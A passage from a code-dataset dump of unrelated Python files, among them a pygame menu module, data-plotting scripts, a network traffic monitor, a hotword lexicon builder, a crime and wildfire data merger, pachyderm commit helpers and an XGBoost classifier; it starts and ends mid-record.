LEVEL_WIDTH % 2 != 0:\n pl_xn = (LEVEL_WIDTH - 1) // 2\n else:\n pl_xn = LEVEL_WIDTH // 2\n sp = []\n for i in range(LEVEL_WIDTH):\n if i != pl_xn:\n sp.append('-')\n else:\n sp.append('P')\n for i in range(5):\n map1.append(''.join(sp).replace('P', '-'))\n map1.append(''.join(sp))\n return map1\n\n\ndef pause_screen(lesson_number):\n \"\"\"Выводит окно для паузы\"\"\"\n global music\n pygame.mouse.set_visible(True)\n answer = None\n sp = []\n k = 0\n intro_text = ['Пауза', \"Продолжить\", \"К уровням\", \"Главное меню\"]\n screen.fill((0, 0, 0))\n Fon(-400, -200, fon_group, lesson_number)\n fon_group.draw(screen)\n font = pygame.font.Font(None, 50)\n text_coord = [(170, 100), (110, 300), (130, 350), (100, 400)]\n for line in range(len(intro_text)): # Загрузка текста\n string_rendered = font.render(intro_text[line], 1, pygame.Color('white'))\n intro_rect = string_rendered.get_rect()\n intro_rect.top = text_coord[line][1]\n intro_rect.x = text_coord[line][0]\n sp.append(intro_rect)\n screen.blit(string_rendered, intro_rect)\n play_button = sp[1]\n lesson_button = sp[2]\n main_menu_button = sp[3]\n while True: # Обработка действий пользователя\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Выход\n terminate()\n elif event.type == pygame.MOUSEBUTTONDOWN: # Нажатие на кнопки\n if lesson_button.collidepoint(event.pos):\n answer = 'les'\n pygame.mixer_music.play(-1)\n music = 0\n if main_menu_button.collidepoint(event.pos):\n answer = 'main'\n pygame.mixer_music.play(-1)\n music = 0\n if play_button.collidepoint(event.pos):\n answer = 'play'\n\n if k % FPS == 0: # Когда прошла секунда, смотрим сделал ли пользователь выбор или нет\n if answer is not None:\n return answer # Если время прошло выбор сделан, то отправляем этот выбор\n else:\n pygame.time.wait(1000) # Если нет, то останвливаем время дальше, чтобы не потерять события в игре\n k = 0\n k += 1\n pygame.display.flip()\n clock.tick(FPS)\n\n\ndef end_screen(won, lesson_number, falcon_mode, 
function_for_choice_mode_screen):\n \"\"\"Функция для обработки конца игры\n won - показатель победы\"\"\"\n global music\n pygame.mouse.set_visible(True)\n sp = []\n if won:\n intro_text = [\"Вы победили\"]\n else:\n intro_text = [\"Вы проиграли\"]\n intro_text.append(\"К уровням\")\n intro_text.append(\"Главное меню\")\n if won and lesson_number != 3: # Если уровень третий, то следущего уровня нет\n intro_text.append('К следующему уровню')\n else:\n intro_text.append('Повторить попытку')\n if won: # Музыка победы\n pygame.mixer_music.load(sounds['won_theme'])\n pygame.mixer_music.play(-1)\n pygame.mixer_music.set_volume(0.6)\n else: # Музыка поражения\n pygame.mixer_music.load(sounds['lose_theme'])\n pygame.mixer_music.play(-1)\n music = 0\n screen.fill((0, 0, 0))\n Fon(-400, -200, fon_group, 3)\n fon_group.draw(screen)\n font = pygame.font.Font(None, 50)\n text_coord = [(100, 100), (130, 300), (95, 350)]\n if won and lesson_number != 3: # В зависимости от длины слова меняется координата\n text_coord.append((30, 250))\n else:\n text_coord.append((60, 250))\n for line in range(len(intro_text)): # Загрузка текста\n string_rendered = font.render(intro_text[line], 1, pygame.Color('white'))\n intro_rect = string_rendered.get_rect()\n intro_rect.top = text_coord[line][1]\n intro_rect.x = text_coord[line][0]\n sp.append(intro_rect)\n screen.blit(string_rendered, intro_rect)\n button_for_lessons = sp[1] # Переход к уровням\n button_for_main = sp[2] # Переход к главному меню\n button_for_next_lesson = sp[3] # Переход к повтору или следующему уровню\n # Зависит от прохождения уровня\n while True: # Обработка действий пользователя\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Выход\n terminate()\n elif event.type == pygame.MOUSEBUTTONDOWN: # Нажатие на кнопки\n if button_for_lessons.collidepoint(event.pos):\n return display_lessons(falcon_mode, function_for_choice_mode_screen)\n if button_for_main.collidepoint(event.pos):\n return start_screen(function_for_choice_mode_screen, falcon_mode)\n if button_for_next_lesson.collidepoint(event.pos):\n # Используем втор��й случай display_lessons с переходом на другой уровень без выбора пользователя\n if not won or lesson_number == 3:\n return display_lessons(falcon_mode, function_for_choice_mode_screen, lesson_number)\n else:\n return display_lessons(falcon_mode, function_for_choice_mode_screen, lesson_number + 1)\n pygame.display.flip()\n clock.tick(FPS)\n","sub_path":"levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":17464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"111543989","text":"import json\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nimport numpy as np\n\n\n\nratio_news = []\nratio_news_1level = []\nratio_ustop200 = []\nratio_ustop200_1level = []\n\nwith open('site_network_news_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_news.append(time['ad_plus_inherited_ratio'])\n\nwith open('site_network_news_1level_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_news_1level.append(time['ad_plus_inherited_ratio'])\n\nwith open('site_network_ustop200_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_ustop200.append(time['ad_plus_inherited_ratio'])\n\nwith open('site_network_ustop200_1level_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_ustop200_1level.append(time['ad_plus_inherited_ratio'])\n\nn_bins = 
10000 \nfig, ax = plt.subplots()\nplt.xticks(np.arange(0, 1.1, step=0.1))\nplt.yticks(np.arange(0, 1.1, step=0.1))\nplt.grid(b=True, which='major', color='gray', linestyle='-', alpha=0.2)\nplt.grid(b=True, which='minor', color='gray', linestyle='-', alpha=0.2)\n\nn, bins, patches = plt.hist(ratio_news, n_bins, density=True, histtype='step',\n cumulative=True, label='News (landing)', range=(0, 1))\n\nn, bins, patches = plt.hist(ratio_news_1level, n_bins, density=True, histtype='step',\n cumulative=True, label='News (post-click)', range=(0, 1))\n\nn, bins, patches = plt.hist(ratio_ustop200, n_bins, density=True, histtype='step',\n cumulative=True, label='General (landing)', range=(0, 1))\n\nn, bins, patches = plt.hist(ratio_ustop200_1level, n_bins, density=True, histtype='step',\n cumulative=True, label='General (post-click)', range=(0, 1))\n\nplt.xlabel('Network Cost Ratio of Ads')\nplt.ylabel('Fraction of Websites')\nplt.title('Ads Network Cost (CDF)') \nplt.legend(loc='lower right')\n\naxpolygons = [poly for poly in ax.get_children() if isinstance(poly, mpl.patches.Polygon)]\nfor poly in axpolygons:\n poly.set_xy(poly.get_xy()[:-1])\n\nplt.savefig('network_cost_cdf', format='pdf')\nplt.show()\n","sub_path":"plot/site_ad_network_ratio/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"189578501","text":"from time import time\n\nclass Bytes(float):\n\n def __new__(cls, val):\n return float.__new__(cls, val)\n\n def __sub__(self, other):\n return Bytes(float.__sub__(self, other))\n\n def __div__(self, other):\n return Bytes(float.__div__(self, other))\n\n @property\n def kib(self):\n return self / 1024\n\n @property\n def mib(self):\n return self / 1024 ** 2\n\nclass Traffic(object):\n\n def __init__(self, interface, download, upload):\n self.interface = interface\n self.download = download\n self.upload = upload\n\n def __sub__(self, other):\n download_delta = self.download - other.download\n upload_delta = self.upload - other.upload\n return (download_delta, upload_delta)\n\nclass NetworkMonitor(object):\n\n def __init__(self, interface):\n self.interface = interface\n\n self.download_total = 0\n self.upload_total = 0\n self.download_per_sec = 0\n self.upload_per_sec = 0\n\n self.last_updated = time()\n self.traffic = Traffic(interface, 0, 0)\n\n def _parse_traffic(self):\n with open('/proc/net/dev', 'r') as file_:\n interfaces = file_.readlines()[2:] #ignore header\n\n for interface in interfaces:\n interface = interface.split()\n name, download = interface[:2]\n upload = interface[9]\n name = name.replace(':', '')\n\n if name == self.interface:\n return Traffic(name, Bytes(download), Bytes(upload))\n\n def update(self):\n traffic = self._parse_traffic()\n now = time()\n\n download_delta, upload_delta = traffic - self.traffic\n time_delta = now - self.last_updated\n\n self.download_total = traffic.download\n self.upload_total = traffic.upload\n self.download_per_sec = download_delta / time_delta\n self.upload_per_sec = upload_delta / time_delta\n\n self.traffic = traffic\n self.last_updated = now\n","sub_path":"src/org.cream.melange.NetworkMonitorWidget/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"479422621","text":"def roznorodnosc(il_boh, poziomy):\n wyk = 0\n pop = []\n for poziom in poziomy:\n if poziom - 1 not in 
pop:\n            poziomy[wyk] -= 1\n            pop.append(poziom - 1)\n        elif poziom not in pop:\n            pop.append(poziom)\n        elif poziom + 1 not in pop:\n            poziomy[wyk] += 1\n            pop.append(poziom + 1)\n    return len(pop)\n\n\ndef main():\n    n = int(input())\n    p = sorted(int(i) for i in input().split())\n    assert n == len(p)\n    print(roznorodnosc(n, p))\n\n\nif __name__ == "__main__":\n    main()\n","sub_path":"oij/python/zad_prob_a/zad_prob_a.py","file_name":"zad_prob_a.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"17626801","text":"__author__ = 'bingham'\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))\n\nimport code.data_process.user_based_collaborative_filtering as ubcf\nimport code.data_format.random_split_data as rsd\nimport code.data_analyse.result_plot as rp\n\ndef recall(train_list, test_list, user_similarity, user_artname_dict, k = 3, N = 5):\n    hit = 0\n    all = 0\n    for i in range(len(train_list)):\n        user = train_list[i][0][0]\n        tu = test_list[i]\n        rank = ubcf.get_recommendation(user, user_similarity, user_artname_dict, k, N)\n        for item in rank.keys():\n            if [user, item] in tu:\n                hit += 1\n        all += len(tu)\n    return hit / (all * 1.0)\n\ndef precision(train_list, test_list, user_similarity, user_artname_dict, k = 3, N = 5):\n    hit = 0\n    all = 0\n    for i in range(len(train_list)):\n        user = train_list[i][0][0]\n        tu = test_list[i]\n        rank = ubcf.get_recommendation(user, user_similarity, user_artname_dict, k, N)\n        for item in rank.keys():\n            if [user, item] in tu:\n                hit += 1\n        all += N\n    return hit / (all * 1.0)\n\nif __name__ == '__main__':\n\n    train_list, test_list = rsd.split_all_users()\n\n    user_artname_dict = ubcf.build_user_artname_dict_by_train_list(train_list)\n    user_similarity = ubcf.calculate_user_similarity(user_artname_dict)\n\n    N = 5\n    recall_list = []\n    precision_list = []\n    for k in range(1, 20):\n        recall_result = recall(train_list, test_list, user_similarity, user_artname_dict, k, N) * 100\n        precision_result = precision(train_list, test_list, user_similarity, user_artname_dict, k, N) * 100\n        recall_list.append((k, recall_result))\n        precision_list.append((k, precision_result))\n\n    # print precision_list\n\n    rp.show_plot_for_list(recall_list)\n\n\n\n","sub_path":"code/data_analyse/recommendation_result_evaluation.py","file_name":"recommendation_result_evaluation.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"612497245","text":"#!/usr/bin/env python3\n"""\nFilename: S1_createhotWordLexiconUnigram \nAuthor: Chng Eng Siong\nDate: 31 July 2021\nLast edited: 28 Aug 2021 (CES), 11:07pm\n\n# This library supports reading a unigram count file generated by ngram-count\n# it assumes 2 fields, 1 left field == string, right field == count\n# we will not assume anything else, and the string can be non-english words.\n# we will remove ALL non-english entries, and resort.\n"""\n\nimport os, sys, io\nimport logging\nimport json \nimport argparse\n\nsys.path.append('./local')\nfrom libWord import C_WordList, C_OneWord\nfrom libWordCount import C_WordSortedCountDict, C_WordUnSortedCountDict\nimport subprocess\n\n\nlogging.basicConfig(\n    format='%(asctime)s,%(msecs)d %(name)s %(levelname)s [%(filename)s:%(lineno)d] %(message)s',\n    datefmt='%H:%M:%S',\n    level=logging.INFO)\nlog = logging.getLogger("{}".format(os.path.basename(sys.argv[0])))\n\n\ndef 
wordIsRomanChars(w):\n return w[0].upper() and all([ord(c) <128 or (ord(c) >= 65313 and ord(c) <= 65339) or (ord(c) >= 65345 and ord(c) <= 65371) for c in w])\n\n\n\ndef HWLG_fromMaster(config,opDir, unigram_master, hotwordRawList, opHotDecoderUnigram, opHotDecoderLexicon):\n \n log.info(\"{}\".format('S1: HWLG_fromMaster: Creating HotWord Decoder LG from Master unigramcount'))\n select_SqrtUnigramCount = config['HWLG_fromMaster']['select_SqrtUnigramCount']\n useTopN_MasterWord = config['HWLG_fromMaster']['useTopN_MasterWord']\n threshold_N_forCountHotWord = config['HWLG_fromMaster']['threshold_N_forCountHotWord']\n # parameters to use:\n print(select_SqrtUnigramCount, useTopN_MasterWord,threshold_N_forCountHotWord)\n\n myMasterCount = C_WordSortedCountDict()\n myMasterCount.readUnigramCount( unigram_master,useTopN_MasterWord) # reading topN entries\n foundTok = myMasterCount.dictSortedIdxToStr[threshold_N_forCountHotWord-1]\n foundCountThreshold = myMasterCount.dictStrToSortedCount[foundTok]\n opStr = \"read unigramcount, Threshold for hotword \"+ str(foundCountThreshold)\n log.info(\"{}\".format(opStr))\n\n # Lets read the hot word first\n listWord = C_WordList()\n \n listWord.read_WordList(hotwordRawList,True)\n # we must use above class, as we need the label of the hotword in __Tanjong_Pagar_Way\n # we must pass it a flag to tell read_WordList if or if not hotWord\n myHotWordCount = C_WordUnSortedCountDict()\n for oneWordStr in listWord.listWordStr:\n oneWord = listWord.dictWStrToCWord[oneWordStr]\n countPron = 0\n for pronStr in oneWord.wordArrayPron: \n if countPron == 0:\n myHotWordCount.addWordCount(oneWord.wordLabel, foundCountThreshold)\n countPron = countPron+1\n else:\n # This is for multiple pronunciation using #1, #2, .. etc\n myHotWordCount.addWordCount(oneWord.wordLabel+'#'+str(countPron), foundCountThreshold)\n countPron=countPron+1\n\n #inserting the hotword and label into the myHotWordCount\n opStr = \"completed constructing myHotWordCount hotwords :\"\n log.info(\"{}\".format(opStr))\n \n listOfWordToAdd = ['','','','','']\n for oneWordStr in listOfWordToAdd:\n myHotWordCount.addWordCount(oneWordStr , foundCountThreshold)\n\n\n if config['HWLG_fromMaster']['select_SqrtUnigramCount'] == 1:\n #sqrt root the count\n print('SQRT change in count')\n myMasterCount.SqrtRootCount()\n myHotWordCount.SqrtRootCount()\n\n\n if config['HWLG_fromMaster']['select_SqrtUnigramCount'] == 0:\n print('no change in count')\n pass\n\n\n # here we save the count files \n myMasterCount.SaveFile(opHotDecoderUnigram,'w')\n myHotWordCount.SaveFile(opHotDecoderUnigram,'a')\n\n # here we save the lexicon\n list_englishWordsUnigram = sorted(set(myMasterCount.dictStrToSortedCount.keys()))\n listWord.add_WordList( list_englishWordsUnigram, False) #MUST set second entry to False it is NOT a hotword\n listWord.write_WordLexicon(opHotDecoderLexicon)\n\n opStr = \"completed creating hotwordDecoderUnigram.txt and hotwordDecoderLex.txt in \"+opDir\n log.info(\"{}\".format(opStr))\n\n\n\ndef HWLG_fromBPE():\n log.info(\"{}\".format('Creating HotWord Decoder LG from BPEWord'))\n # We have NOT implemented this yet\n # die\n\n\n\n# This function will create in OpDir/config_LG\n# The lexicon and count for hotword decoder\n\ndef real_main(ipJsonFileName): \n\n log.info(\"{}\".format(\"S1_createhotWordLexiconUnigram.py: creating the hotword decoder's lexicon and LMcount from Master with settings\"))\n with open(ipJsonFileName, mode=\"r\") as j_object:\n config = json.load(j_object)\n # Lets check the required 
directories\n log.info(\"{}\".format(\"model=\"+config['model_name']))\n\n exptInfo=config['ExptInfo']['HWLG']\n log.info(\"{}\".format(\"creating the experiment using:\"+exptInfo))\n\n exptDir=config['ExptInfo']['exptDir']\n inputDir=config['ExptInfo']['inputDir'].replace('$exptDir',exptDir)\n outputDir=config['ExptInfo']['outputDir'].replace('$exptDir',exptDir)\n dataLGDir=config['ExptInfo']['dataLGDir'].replace('$exptDir',exptDir)\n\n masterDir=config['MasterDecoder']['masterDir'] \n unigram_master = config['MasterDecoder']['unigram_master'].replace('$masterDir',masterDir)\n hotwordRawList = config['ExptInfo']['ipHotWordList']\n\n opHotDecoderUnigram = dataLGDir+'/'+config['dataLGDir']['hwUnigram_txt']\n opHotDecoderUnigramArpa = dataLGDir+'/'+config['dataLGDir']['hwUnigram_arpa']\n opHotDecoderUnigramArpa_gzip = dataLGDir+'/'+config['dataLGDir']['hwUnigram_arpa_gz']\n opHotDecoderLexicon = dataLGDir+'/'+config['dataLGDir']['hwLex']\n\n if (exptInfo == 'HWLG_fromMaster'):\n HWLG_fromMaster(config,exptDir, unigram_master, hotwordRawList, opHotDecoderUnigram,opHotDecoderLexicon)\n\n if (exptInfo == 'HWLG_fromBPE'):\n HWLG_fromBPE(config)\n\n\n ngram_cmd = config['KaldiDir']['SRILM_ROOT']+'/ngram-count' \n\n result1 = subprocess.Popen([ngram_cmd, '-read', opHotDecoderUnigram ,'-lm',opHotDecoderUnigramArpa ])\n result1.wait()\n print(result1)\n\n opCmdStr = 'gzip -c '+opHotDecoderUnigramArpa+' > '+opHotDecoderUnigramArpa_gzip \n print('execute:'+opCmdStr)\n os.system(opCmdStr)\n\n\ndef main():\n parse = argparse.ArgumentParser()\n parse.add_argument('--json', required=True, help=\"json file to setup experiment\")\n args = parse.parse_args()\n real_main(args.json)\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"S1_createhotWordLexiconUnigram.py","file_name":"S1_createhotWordLexiconUnigram.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"653478142","text":"import os\nimport logging\n\nfrom pymongo import MongoClient\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nmongo = MongoClient(\"mongodb://localhost:27017\")\ndb = mongo['aircode']\ncol = db['shopnt_prod']\n\nlogging.basicConfig(\n format='%(message)s',\n filename='crawler/shopnt/unknown.txt', level=logging.INFO)\n\nn_unk = 0\nn_known = 0\n\nwith open(os.path.join(BASE_DIR, 'unknowndata_201223.txt'), 'r') as f:\n data = f.readlines()\n for row in data:\n prod_id = row.strip()\n result = list(col.find({'prod_id':prod_id}))\n if result:\n # for d in result:\n # print(f\"{d['prod_id']}\\t{d['prod_name']}\")\n # logging.info(f\"{d['prod_id']}\\t{d['prod_name']}\")\n n_known += 1\n else:\n n_unk += 1\n logging.info(f'{prod_id}')\n\nprint(\"known\", n_known)\nprint(\"unk\", n_unk)","sub_path":"shopnt/find_unknown.py","file_name":"find_unknown.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"353162445","text":"import re\nfrom typing import NamedTuple, Union\n\nfrom python_pachyderm.proto.v2.pfs import pfs_pb2\n\n\n# copied from pachyderm/pachyderm\nvalid_branch_re = re.compile(r\"^[a-zA-Z0-9_-]+$\")\nuuid_re = re.compile(r\"[0-9a-f]{12}4[0-9a-f]{19}\")\n\n\nclass Commit(NamedTuple):\n repo: str\n branch: str = None\n id: str = None\n repo_type: str = \"user\"\n\n \"\"\"A namedtuple subclass to specify a Commit.\"\"\"\n\n def to_pb(self) -> pfs_pb2.Commit:\n \"\"\"Converts itself into a `pfs_pb2.Commit`\"\"\"\n return 
pfs_pb2.Commit(\n id=self.id,\n branch=pfs_pb2.Branch(\n repo=pfs_pb2.Repo(name=self.repo, type=self.repo_type), name=self.branch\n ),\n )\n\n @staticmethod\n def from_pb(commit: pfs_pb2.Commit) -> \"Commit\":\n return Commit(\n repo=commit.branch.repo.name,\n branch=commit.branch.name,\n id=commit.id,\n repo_type=commit.branch.repo.type,\n )\n\n\ndef commit_from(\n commit: Union[tuple, dict, Commit, pfs_pb2.Commit] = None,\n) -> pfs_pb2.Commit:\n \"\"\"A commit can be identified by [repo, repo_type, branch, commit_id]\n\n Helper function to convert objects that represent a Commit query into a\n protobuf Commit object.\n \"\"\"\n if isinstance(commit, pfs_pb2.Commit):\n return commit\n if isinstance(commit, Commit):\n return commit.to_pb()\n if isinstance(commit, tuple):\n repo, branch, commit_id, repo_type = None, None, None, \"user\"\n if len(commit) == 2:\n repo, branch_or_commit = commit\n if uuid_re.match(branch_or_commit) or not valid_branch_re.match(\n branch_or_commit\n ):\n commit_id = branch_or_commit\n else:\n branch = branch_or_commit\n elif len(commit) == 3:\n repo, branch, commit_id = commit\n else:\n repo, branch, commit_id, repo_type = commit\n return Commit(\n repo=repo, branch=branch, id=commit_id, repo_type=repo_type\n ).to_pb()\n if isinstance(commit, dict):\n return Commit(**commit).to_pb()\n if commit is None:\n return None\n\n raise TypeError(\"Please provide a tuple, dict, or Commit object\")\n","sub_path":"src/python_pachyderm/pfs.py","file_name":"pfs.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"23196860","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 7 16:19:59 2017\n\n@author: Dane\n\"\"\"\n\nimport pandas as pd\nfrom scipy import sparse\nimport os\n\n# Set the working directory for the project\nos.chdir('C://Users/Dane/Documents/GitHub/seis735_project/')\n\n####################################################################\n## Step 1: Prepare the training data and test data\n####################################################################\n\n# Read the training data\ndf_train = pd.read_csv('data/interim/train_freq.gz', compression='gzip', encoding='ISO-8859-1')\n\n# Keep only the predictors\ndf_train.drop(['ID','Gene','Variation'], inplace=True, axis=1)\n\n# Convert predictors to matrix format\nx_train = sparse.csr_matrix(df_train.as_matrix()[:,1:])\ny_train = df_train.as_matrix()[:,0]\n\n# Cleanup\ndel df_train\n\n# Read the test data\ndf_test = pd.read_csv('data/interim/test_freq.gz', compression='gzip', encoding='ISO-8859-1')\n\n# Keep only the predictors\ndf_test.drop(['ID','Gene','Variation'], inplace=True, axis=1)\n\n# Convert predictors to matrix format\nx_test = sparse.csr_matrix(df_test.as_matrix()[:,1:])\ny_test = df_test.as_matrix()[:,0]\n\n# Cleanup\ndel df_test\n\n########################################################################\n## Step 2: Dimensionality reduction\n########################################################################\n\nfrom sklearn.decomposition import TruncatedSVD\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Train the model\nsvd = TruncatedSVD(n_components=1000, n_iter=20, random_state=42)\nsvd.fit(x_train)\n\n# Get the explained variance\nvar = svd.explained_variance_\nprint(np.sum(var))\n\n# Plot the variance\nplt.plot(var)\nplt.ylabel('Explained Variance')\nplt.show()\n\n# Transform the data (reduce the dimensions)\nx_train_red = svd.transform(x_train)\nx_test_red = 
svd.transform(x_test)\n\n####################################################################\n## Step 3: Create and train the model\n####################################################################\n\nfrom xgboost import XGBClassifier\n\n# Initialize the model parameters\nxgb = XGBClassifier(learning_rate=0.333,\n max_depth=4,\n n_estimators=2000,\n objective='multi:softprob',\n eval_metric='mlogloss',\n num_class=9,\n n_jobs=-1\n )\n\n# Train the model\nxgb.fit(x_train_red,\n y_train,\n verbose=True,\n early_stopping_rounds=50,\n eval_set=[(x_train_red, y_train), (x_test_red, y_test)]\n )\n\n# Make the predictions\npreds = xgb.predict(x_test_red)\nprobs = xgb.predict_proba(x_test_red)\n\n####################################################################\n## Step 3: Evaluate the model\n####################################################################\n\nfrom sklearn.metrics import confusion_matrix\nimport itertools\n\ndef plot_confusion_matrix(cm, classes,normalize=False,title='Confusion matrix',cmap=plt.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n# Create the confusion matrix\ncm = confusion_matrix(y_test, preds, labels=[1,2,3,4,5,6,7,8,9])\n\n# Calculate accuracy\nacc = np.sum(np.diag(cm)) / np.sum(cm)\nprint('Accuracy: %0.5f' % acc)\n\n# Plot non-normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cm, classes=[1,2,3,4,5,6,7,8,9],\n title='Confusion matrix, without normalization')\nplt.show()\n\n####################################################################\n## Step 4: Save the model\n####################################################################\n\nimport pickle\n\n# Save the SVD model\nwith open('models/svd_500_v1.pickle', 'wb') as handle:\n pickle.dump(svd, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n# Save the xgb model\nwith open('models/xgboost_v1.pickle', 'wb') as handle:\n pickle.dump(xgb, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n","sub_path":"src/modeling/xgboost_svd.py","file_name":"xgboost_svd.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"417540979","text":"from fire_and_smoke import *\nfrom crime import *\n\n# Fire & smoke params\nshape_path = 'test-firecrime/data/oper/newhms/output/'\nurl = 'https://satepsanone.nesdis.noaa.gov/pub/volcano/FIRE/HMS_ARCHIVE/2018/GIS/{}/hms_{}{}.zip'\nsink_path=\"test-firecrime\"\n\n# Crime params\nclient = Socrata(\"moto.data.socrata.com\",None)\ndf_socrata_key = \"p6kq-vsa3\"\ncolumns_list = ['incident_datetime','incident_type_primary','parent_incident_type','state','city','latitude','longitude']\n\n# Date\nstart_date = '2018-07-01'\nend_date = '2018-07-31'\ndate_range = build_date_range(start_date, end_date)\n\ndf_list = [] \n\nfor date in date_range:\n # Smoke df\n extract_geo_shape(url,sink_path, date, 
dataset='smoke')\n    smoke = create_geo_df(date, shape_path, dataset='smoke')\n    # Select density and geometry\n    smoke = smoke[['Density', 'geometry']]\n\n    # Fire df\n    # ESRI:102009 North America Lambert Conformal Conic (unit is in meters, good for North America)\n    meters_crs='+proj=lcc +lat_1=20 +lat_2=60 +lat_0=40 +lon_0=-96 +x_0=0 +y_0=0 +datum=NAD83 +units=m +no_defs'\n    extract_geo_shape(url,sink_path, date, dataset='fire')\n    fire = create_geo_df(date,shape_path, dataset='fire')\n    fire = fire.to_crs(meters_crs)\n\n    # Crime df\n    crimes = create_crime_df(df_socrata_key, columns_list, date)\n    crime_by_city = create_crime_by_date_city_df(crimes)\n\n    # Cities df\n    cities = create_cities_df(crimes)\n    cities = assign_geom_cities(cities, crs = {'init':'epsg:4326'})\n\n    # Spatial join between cities and smoke\n    cities_smoke = gpd.sjoin(cities, smoke, how='left',op=\"within\")\n\n    # Cities in meters crs\n    cities = cities.to_crs(meters_crs)\n    cities = create_city_buffer(cities,buffer_radius=50000)\n\n    # Spatial join between cities and fires\n    cities_fire = gpd.sjoin(cities, fire, how='left')\n    # Count fires\n    cities_fire = count_fires_by_city(cities_fire)\n\n    # Join crimes and smoke\n    cities_smoke = pd.merge(crime_by_city, cities_smoke)\n    # Final df\n    final_df = pd.merge(cities_smoke, cities_fire)[['incident_date','parent_incident_type','crime_count','city','state','Density','fires_count']]\n\n    print('Writing df for {}'.format(date))\n    df_list.append(final_df)\n\n\ndf_list = pd.concat(df_list)\ndf_list.to_csv(\"df_test.csv\",index=False)","sub_path":"create_fire_crime_df.py","file_name":"create_fire_crime_df.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"149587484","text":"import os\nimport tqdm\nfrom nltk.stem.snowball import SnowballStemmer\nfrom natasha import Segmenter, Doc\n\n\ndef is_abbreviation(word):\n    if (sum(1 for char in word if char.isupper()) / len(word)) >= 0.5:\n        return True\n    else:\n        return False\n\n\ndef clean_entity(entry):\n    # document 994383 contained a strange token with *, so strip such characters here,\n    # otherwise the dimensions no longer match\n    entry = entry.replace('*', '')\n    # in document 990538, Sputnik'ом is split into three tokens, so the 'ом suffix is removed\n    # document 927141: Ростова-на Дону -> Ростова-на-Дону\n    # document 1041141: Кара- оол -> Кара-оол\n    if '’ом' in entry:\n        entry = entry.replace('’ом', '')\n\n    if '«' in entry:\n        entry = entry.replace('«', '')\n\n    if '»' in entry:\n        entry = entry.replace('»', '')\n\n    if '(' in entry:\n        entry = entry.replace('(', '')\n\n    if ')' in entry:\n        entry = entry.replace(')', '')\n\n    if entry == 'Ростова-на Дону':\n        entry = 'Ростова-на-Дону'\n\n    if entry == 'Кара- оол':\n        entry = 'Кара-оол'\n\n    return entry\n\n\nclass RuNormASReaderForSequenceTagging():\n    def __init__(self):\n        self.endings = []\n        self.normalization_endings = []\n        self.stemmer = SnowballStemmer('russian')\n        self.symbols = ['«', '»', '(', ')', \"'\", '’']\n\n    def read(self, text_filename, annotation_filename, normalization_filename):\n        text = open(text_filename, 'r', encoding='utf-8').read()\n        annotation = open(annotation_filename, 'r', encoding='utf-8').read().strip().split('\\n')\n        normalization = open(normalization_filename, 'r', encoding='utf-8').read().strip().split('\\n')\n\n        segmenter = Segmenter()\n\n        doc_text = Doc(text)\n        doc_text.segment(segmenter)\n\n        entities = []\n        number_of_entities_in_annotation = 0\n\n        for line in annotation:\n            if line != '\\n' and line != '':\n                number_of_entities_in_annotation += 1\n\n                spans = list(map(int, line.strip().split()))\n                entry = ''\n\n                while spans:\n                    start, stop = spans[0], spans[1]\n                    entry += text[start: stop] + ' '\n                    spans = spans[2:]\n\n                entry = entry.strip()\n                entry = clean_entity(entry)\n\n                doc = Doc(entry)\n                doc.segment(segmenter)\n\n                entities += [doc.tokens]\n\n        # print(len(entities), entities)\n\n        normalized_entities = []\n        for line in normalization:\n            line = line.strip()\n            entry = clean_entity(line)\n            entry = 